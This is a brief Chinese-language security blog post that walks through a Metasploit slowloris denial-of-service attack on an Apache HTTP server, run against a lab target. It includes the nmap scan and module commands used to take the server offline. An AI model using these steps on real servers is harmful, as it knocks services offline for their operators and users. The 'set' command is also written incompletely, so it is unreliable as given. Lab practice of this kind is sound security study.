Metasploit -- 对Apache HTTP服务器守护进
2020-05-04 本文已影响0人
玉宾
后来我发现,太浓烈的东西总是不长久,应了那句老话,第一眼就心动的人没法做朋友 。。。
---- 网易云热评
一、漏洞简介
Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),这与2.2.15之前版本中缺少mod_ReqTimeout模块有关。
二、漏洞利用
1、访问我们的靶机:192.168.1.131,正常访问
2、启动msf,通过nmap扫描该服务器,判断该漏洞是否存在,nmap -sS -Pn -A 192.168.1.131
3、搜索可利用模块,并选择
search slowloris
4、查看需要配置的参数,只需配置目标ip即可show options
5、设置目标ip set 192.168.1.131
6、运行,run
7、再次访问靶机192.168.1.131,已无法访问
8、ctrl+c结束攻击,网页瞬间就又可以访问了
禁止非法,后果自负
欢迎关注公众号:web安全工具库